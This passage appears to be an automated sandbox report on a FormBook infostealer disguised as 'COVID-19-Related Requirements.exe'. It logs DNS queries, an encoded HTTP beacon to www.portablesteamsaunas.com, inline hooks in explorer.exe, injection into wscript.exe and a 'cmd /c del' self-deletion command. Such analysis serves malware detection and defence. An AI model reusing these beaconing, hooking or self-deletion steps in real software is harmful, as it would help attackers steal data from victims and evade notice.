                                        May 26, 2021 19:58:33.098027945 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:34.461113930 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:34.510832071 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:35.378665924 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:35.428589106 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:36.308442116 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:36.358377934 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:37.164037943 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:37.214018106 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:38.040323973 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:38.092006922 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:38.924808025 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:38.977406025 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:39.788191080 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:39.837759018 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:59.119628906 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:59.189332962 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:59:18.691482067 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:59:18.751732111 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:59:19.418623924 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:59:19.484973907 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:59:20.127902985 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:59:20.186115980 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:59:20.774699926 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:59:20.834909916 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:59:21.067723989 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:59:21.129338980 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:59:21.408696890 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:59:21.458370924 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:59:22.096962929 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:59:22.147989035 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:59:22.663640022 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:59:22.725488901 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:59:24.745949030 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:59:24.796406984 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:59:26.713046074 CEST | 51818 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:59:26.767188072 CEST | 53 | 51818 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:59:28.418070078 CEST | 56628 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:59:28.479312897 CEST | 53 | 56628 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:59:39.410810947 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:59:39.476773977 CEST | 53 | 60778 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 20:00:02.467072964 CEST | 53799 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 20:00:02.526500940 CEST | 53 | 53799 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 20:00:10.380151987 CEST | 54683 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 20:00:10.438338995 CEST | 53 | 54683 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 20:00:12.148670912 CEST | 59329 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 20:00:12.209837914 CEST | 53 | 59329 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 20:00:30.471061945 CEST | 64021 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 20:00:30.536492109 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.6

                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        May 26, 2021 20:00:30.471061945 CEST | 192.168.2.6 | 8.8.8.8 | 0x5c0c | Standard query (0) | www.portablesteamsaunas.com | A (IP address) | IN (0x0001)

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        May 26, 2021 20:00:30.536492109 CEST | 8.8.8.8 | 192.168.2.6 | 0x5c0c | No error (0) | www.portablesteamsaunas.com | | 52.58.78.16 | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.portablesteamsaunas.com

                                        HTTP Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.6 | 49748 | 52.58.78.16 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        May 26, 2021 20:00:30.606018066 CEST | 5463 | OUT | GET /cgsp/?zR-4q=wCZjRreTETPxpz3yzi5aMK9lgrBwWrXWegbflPnh9KjaaDHMPgi5SZz4hafy+YGLKOgeKwGRDg==&hB0=D8yhC83P6d34H HTTP/1.1
                                        Host: www.portablesteamsaunas.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 26, 2021 20:00:30.648032904 CEST | 5463 | IN | HTTP/1.1 410 Gone
                                        Server: openresty
                                        Date: Wed, 26 May 2021 17:59:16 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 37 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6f 72 74 61 62 6c 65 73 74 65 61 6d 73 61 75 6e 61 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 34 33 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6f 72 74 61 62 6c 65 73 74 65 61 6d 73 61 75 6e 61 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 7<html>9 <head>57 <meta http-equiv='refresh' content='5; url=http://www.portablesteamsaunas.com/' />a </head>9 <body>43 You are being redirected to http://www.portablesteamsaunas.coma </body>8</html>0


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function Name | Hook Type | Active in Processes
                                        PeekMessageA  | INLINE    | explorer.exe
                                        PeekMessageW  | INLINE    | explorer.exe
                                        GetMessageW   | INLINE    | explorer.exe
                                        GetMessageA   | INLINE    | explorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function Name | Hook Type | New Data
                                        PeekMessageA  | INLINE    | 0x48 0x8B 0xB8 0x82 0x2E 0xEA
                                        PeekMessageW  | INLINE    | 0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                        GetMessageW   | INLINE    | 0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                        GetMessageA   | INLINE    | 0x48 0x8B 0xB8 0x82 0x2E 0xEA

                                        Statistics

                                        Behavior

                                        System Behavior

                                        General

                                        Start time:19:58:32
                                        Start date:26/05/2021
                                        Path:C:\Users\user\Desktop\COVID-19-Related Requirements.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\COVID-19-Related Requirements.exe'
                                        Imagebase:0xef0000
                                        File size:462336 bytes
                                        MD5 hash:7EFD588DF5D918372C111708F02CC3CE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:19:59:18
                                        Start date:26/05/2021
                                        Path:C:\Users\user\Desktop\COVID-19-Related Requirements.exe
                                        Wow64 process (32bit):false
                                        Commandline:{path}
                                        Imagebase:0x350000
                                        File size:462336 bytes
                                        MD5 hash:7EFD588DF5D918372C111708F02CC3CE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:19:59:18
                                        Start date:26/05/2021
                                        Path:C:\Users\user\Desktop\COVID-19-Related Requirements.exe
                                        Wow64 process (32bit):false
                                        Commandline:{path}
                                        Imagebase:0x240000
                                        File size:462336 bytes
                                        MD5 hash:7EFD588DF5D918372C111708F02CC3CE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:19:59:19
                                        Start date:26/05/2021
                                        Path:C:\Users\user\Desktop\COVID-19-Related Requirements.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0xf40000
                                        File size:462336 bytes
                                        MD5 hash:7EFD588DF5D918372C111708F02CC3CE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:19:59:21
                                        Start date:26/05/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff6f22f0000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:19:59:40
                                        Start date:26/05/2021
                                        Path:C:\Windows\SysWOW64\wscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\wscript.exe
                                        Imagebase:0xe20000
                                        File size:147456 bytes
                                        MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Start time:19:59:45
                                        Start date:26/05/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe'
                                        Imagebase:0x2a0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:19:59:46
                                        Start date:26/05/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff61de10000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis